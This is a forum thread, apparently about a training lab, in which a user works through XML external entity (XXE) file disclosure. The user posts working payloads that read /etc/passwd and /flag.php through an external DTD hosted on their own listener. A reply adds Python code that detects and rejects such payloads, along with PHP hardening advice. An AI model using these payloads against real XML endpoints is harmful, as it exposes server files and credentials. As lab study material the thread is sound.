Have a Problem in XXE Advanced File Disclosure

Hello fam,
I am now having a problem in XXE Advanced File Disclosure!

The Lab Question: Use either method from this section to read the flag at ‘/flag.php’. (You may use the CDATA method at ‘/index.php’, or the error-based method at ‘/error’).

My Approach: So I tried the CDATA method as follows.
I first made an xxe.dtd file with the contents <!ENTITY joined "%begin;%file;%end;"> on my host, and after that started my web server!

I went to the target IP's website and started intercepting with Burp. As expected, the request goes through '/submitDetails.php' with the POST method. So I tried to alter the XML data to perform an XXE attack.

Attempt 1
I included the data:

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:///etc/hosts"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
.
.
.
<email>&joined;</email>

which works as expected.

Sorry, I had to delete the screenshot, as they don't permit me to post them as a new user.

Attempt 2
So I tried the core feature of CDATA, to get the PHP source code of submitDetails.php, with the following payload.

<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
  <!ENTITY % file SYSTEM "file:////var/www/html/submitDetails.php"> <!-- reference external file -->
  <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
  <!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->
  %xxe;
]>
.
.
.
<email>&joined;</email>

But this doesn't output anything, as we expected.

Sorry, I had to delete the screenshot, as they don't permit me to post them as a new user.

Attempt 3
So I tried to check another one, this time another system file, which is /etc/passwd. Surprisingly, this doesn't work either (unlike /etc/hosts, which worked).

Attempt 4
OK, I thought maybe they limit the file permissions or the output size, so I tried a basic XXE like the following.

<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

.
.
.

<email>&example;</email>

But guess what, this works.

Sorry, I had to delete the screenshot, as they don't permit me to post them as a new user.

Attempt 5
I have tried the things that I know, but none of them worked.
Bonus: So I tried to see what the question's /flag.php looks like, but it returns a 404 error, not a 302 or 500.
So I came here to ask for help. Maybe some glitch in the lab setup? Or am I missing some important thing?

Thanks a lot. Please help me solve this puzzle.

Screenshot for Attempt 1:

Screenshot for Attempt 2:

Screenshot for Attempt 4:

[SOLVED]
I researched CDATA all the way and tried to alter the method a little. Now all my CDATA tags are on my server. The solution is as follows!
xxe.dtd

<!ENTITY % file SYSTEM "file:///flag.php">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

XML Payload

<!DOCTYPE email [
  <!ENTITY % dtd SYSTEM "http://10.10.16.10:8000/xxe.dtd">
  %dtd;
  %all;
]>
.
.
.
<email>
&fileContents;
</email>

Thank you, today I found out that researching and reading the documentation is also a good practice when something doesn't work out.

3 Likes
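As an added defender-side example (not code from the thread, the lab, or the HTB materials), here is how a form handler like the one behind /submitDetails.php could screen a request body for the DTD features these payloads depend on and refuse it before parsing. Every variant in the thread, whether the internal-subset entities joined by an external .dtd or the plain SYSTEM entity, needs a DOCTYPE to exist, so rejecting DOCTYPE outright removes the whole class of input. The sample bodies, the placeholder listener host, and the function names are constructed for this illustration:

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample request bodies (not taken from the thread's screenshots).
# BENIGN_BODY is what the form is supposed to send; XXE_BODY has the shape of
# the CDATA/external-DTD payload discussed in the thread, with a placeholder
# instead of a real listener address.
BENIGN_BODY = "<email>alice@example.test</email>"
XXE_BODY = """<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///etc/hosts">
  <!ENTITY % end "]]>">
  <!ENTITY % xxe SYSTEM "http://ATTACKER_HOST_PLACEHOLDER:8000/xxe.dtd">
  %xxe;
]>
<email>&joined;</email>"""

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# One ENTITY declaration with an external identifier. Group 1 is the '%' of a
# parameter entity (absent for a general entity); the URI is group 3 for
# SYSTEM and group 4 for PUBLIC (the public ID itself is not needed here).
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([A-Za-z_][\w.-]*)\s+"
    r"(?:SYSTEM\s+[\"']([^\"']*)[\"']|PUBLIC\s+[\"'][^\"']*[\"']\s+[\"']([^\"']*)[\"'])",
    re.IGNORECASE,
)
PE_REF_RE = re.compile(r"%[A-Za-z_][\w.-]*;")


def inspect_xml(body: str) -> list[str]:
    """Return findings describing DTD features in the request body.
    An empty list means the body carries no DTD at all, which is the only
    shape the e-mail form in the thread legitimately needs."""
    findings = []
    if not DOCTYPE_RE.search(body):
        return findings  # no DTD: entity declarations cannot appear
    findings.append("doctype")
    for m in ENTITY_RE.finditer(body):
        kind = "parameter-entity" if m.group(1) else "general-entity"
        uri = m.group(3) or m.group(4)
        findings.append(f"external-{kind}:{uri}")
    if PE_REF_RE.search(body):
        findings.append("parameter-entity-reference")
    return findings


def parse_untrusted(body: str) -> ET.Element:
    """Refuse any body that carries a DTD, then parse with the stdlib parser.
    The findings are raised with the error so they can be logged for
    detection, not just silently dropped."""
    findings = inspect_xml(body)
    if findings:
        raise ValueError("rejected XML with DTD features: " + ", ".join(findings))
    return ET.fromstring(body)


def submit_details(body: str) -> str:
    """Hardened stand-in (hypothetical) for the form handler: returns the
    submitted e-mail address, or an error string suitable for logging."""
    try:
        root = parse_untrusted(body)
    except (ValueError, ET.ParseError) as exc:
        return f"error: {exc}"
    if root.tag != "email" or not (root.text or "").strip():
        return "error: expected a non-empty <email> element"
    return root.text.strip()


if __name__ == "__main__":
    print(submit_details(BENIGN_BODY))
    print(inspect_xml(XXE_BODY))
    print(submit_details(XXE_BODY))
```

The pre-scan is deliberately simple: it only answers "does this body declare a DTD, and which external identifiers and parameter-entity references does it contain", which is also exactly the set of fields worth writing to a request log when a rejection happens. In the PHP stack the lab targets, the corresponding parser-side control is to load XML without the entity-substitution flag (LIBXML_NOENT) and to keep external entity loading disabled, which libxml does by default on current PHP versions.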

Thanks this is what I was missing out!

Hello all,

I'm stuck at this point. I've been doing lots of things but it doesn't work!!! I've been going around in circles for one week, seriously, wtf, I'm losing my hair over this question… Could you help me, because just finding the file flag.php seems impossible… Or not, but how can I do it?
Thanks

Hi guys,

Finally it works, but I think there are lots of problems with the VM… because everything I did today I was already doing yesterday. So cool: it works!!! And I learned lots of things.
Thanks

Can someone please help me on this? It doesn't work, I tried everything!!!

It's indeed tricky!